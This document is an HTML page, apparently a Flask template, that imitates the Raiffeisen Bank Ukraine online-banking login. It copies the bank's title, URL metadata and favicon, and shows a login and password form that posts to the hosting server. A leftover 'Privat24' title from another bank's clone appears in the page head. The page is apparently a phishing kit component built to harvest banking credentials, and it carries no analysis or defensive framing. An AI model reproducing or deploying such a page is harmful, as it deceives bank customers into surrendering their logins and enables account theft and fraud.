<!DOCTYPE html>
<html lang="en">

<head>
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed&display=swap" rel="stylesheet">
        <title>Raiffeisen Online | Raiffeisen Bank</title>
        <meta name="viewport" content="width=device-width">
        <meta property="og:url" content="https://raiffeisen.ua/">
        <meta property="og:type" content="website">
        <meta property="og:title" content="Raiffeisen Bank">
        <meta property="og:description" content="">
        <meta property="og:image" content="/img/logo.svg">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="default">
        <meta name="apple-mobile-web-app-title" content="Privat24">
        <link rel="shortcut icon" href="https://online.raiffeisen.ua/ibank/favicon.ico">
    </head>
</head>
<style>
    * {
        font-family: 'Roboto Condensed', sans-serif;
    }

    body {
        background: #fff;
        color: #000;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 90vh;
    }

    .container {
        display: block;
        margin: 0 auto;
        max-width: 992px;
    }

    .wrapp {
        margin: 0 auto;
        padding: 30px;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
        background: #fff;
        box-shadow: 0 20px 40px rgb(44 62 80 / 15%);
        mix-blend-mode: normal;
        border-radius: 20px;
        max-width: 470px;
    }

    .header {
        margin-top: 80px;
        font-size: 32px;
        line-height: 39px;
        color: #FFFFFF;
    }

    .img {
        margin-bottom: 10px;
    }

    .desc {
        margin: 10px 0;
        font-size: 20px;
        line-height: 24px;
        text-align: center;
        max-width: 300px;
    }

    .btn {
        margin: 0 auto;
        margin-top: 80px;
        display: flex;
        justify-content: center;
        align-items: center;
        background: linear-gradient(179.85deg, #ffe400 0.15%, rgba(187, 187, 187, 0) 861.01%);
        backdrop-filter: blur(2px);
        border-radius: 7px;
        border: none;
        width: 100%;
        height: 35px;
        font-size: 24px;
        line-height: 29px;
        cursor: pointer;
        color: #000;
    }

    .input {
        margin: 0 auto;
        background: #fff;
        border: 1px solid #ffe400;
        border-radius: 7px;
        margin-top: 15px;
        color: #000;
        outline: none;
        text-align: left;
        font-size: 20px;
        width: 100%;
        height: 35px;
        box-sizing: border-box;
        padding-left: 5px;
    }

    .form {
        margin-top: 35px;
        display: flex;
        justify-content: center;
        align-items: flex-start;
        flex-direction: column;
    }

    .form label {
        margin-top: 15px;
        font-size: 20px;
        line-height: 24px;
        color: #767676;
    }



    @media only screen and (max-width: 425px) {
        .wrapp {
            box-sizing: border-box;
            width: 310px;
        }
    }

    @media only screen and (max-height: 580px) {
        .header {
            margin-top: 50px;
        }
    }
</style>

<body>
    <div class="container">
        <div class="wrapp">
            <img src="{{ url_for( 'static', filename='raif/img/logo.svg', v=1)}}" alt="phone" class="img">
            <form method="POST" class="form">
                <label for="phone">Логiн</label>
                <input type="text" name='login' class="input input__phone" id="phone" autocomplete="off">
                <label for="pass">Пароль</label>
                <input type="password" name='password' class="input" id="pass" autocomplete="off">
                <input type="submit" class="btn" id="btn" value="Продовжити">
            </form>

        </div>
    </div>
</body>


</html>